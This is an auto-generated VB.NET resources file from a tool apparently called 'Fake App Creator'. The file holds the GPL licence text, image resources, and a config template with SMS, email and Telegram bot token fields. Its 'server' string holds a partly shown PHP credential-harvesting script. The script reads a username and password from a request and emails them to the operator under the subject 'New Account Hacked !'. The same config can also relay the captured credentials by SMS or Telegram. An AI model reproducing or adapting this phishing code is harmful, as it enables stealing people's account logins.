'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("FakeApp_Creator.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to wlcmsg=$wlc$
        '''waitingmsg=$wait$
        '''nonetmsg=$net$
        '''completemsg=$comp$
        '''action=$web$
        '''pagetitle=$pagetitle$
        '''pagefooter=$footer$
        '''allowsendviasms=$sendviasms$
        '''smsnumber=$smsnum$
        '''allowsendviaemail=$sendviaemail$
        '''allowcapture=%capture$
        '''teleenable=$teleenable$
        '''teletoken=$teletoken$
        '''teleuserid=$teleuserid$.
        '''</summary>
        Friend ReadOnly Property configStr() As String
            Get
                Return ResourceManager.GetString("configStr", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to GNU GENERAL PUBLIC LICENSE
        '''                       Version 3, 29 June 2007
        '''
        ''' Copyright (C) 2007 Free Software Foundation, Inc. &lt;http://fsf.org/&gt;
        ''' Everyone is permitted to copy and distribute verbatim copies
        ''' of this license document, but changing it is not allowed.
        '''
        '''                            Preamble
        '''
        '''  The GNU General Public License is a free, copyleft license for
        '''software and other kinds of works.
        '''
        '''  The licenses for most software and other practical works are designed
        '''to take away your free [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property GNU() As String
            Get
                Return ResourceManager.GetString("GNU", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property ICON() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("ICON", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Nexus_6() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Nexus_6", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;?php
        '''$to = &quot;$email$&quot;;
        '''$subject = &quot;New Account Hacked !&quot;;
        '''
        '''$message = &quot;
        '''&lt;html&gt;
        '''&lt;head&gt;
        '''&lt;title&gt;FAC | Fake App Creator&lt;/title&gt;
        '''&lt;/head&gt;
        '''&lt;body&gt;
        '''&lt;p&gt;FAC by @Sahandevs&lt;/p&gt;
        '''&lt;br&gt;
        '''&lt;p&gt;
        '''telegram.me/CyberSoldiersST
        '''&lt;/p&gt;
        '''&lt;table&gt;
        '''&lt;tr&gt;
        '''&lt;th&gt;Username : &lt;/th&gt;
        '''&lt;th&gt;
        '''&quot;;
        '''$resu = $message . $_GET[&quot;u&quot;] . &quot;&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Password : &lt;/td&gt;&lt;td&gt;&quot; . $_GET[&quot;p&quot;] . &quot;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;&quot;;
        '''
        '''// Always set content-type when sending HTML email
        '''$headers = &quot;MIME-Version: 1.0&quot; . &quot;\r\n&quot;;
        '''$headers .= &quot;Content-ty [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property server() As String
            Get
                Return ResourceManager.GetString("server", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
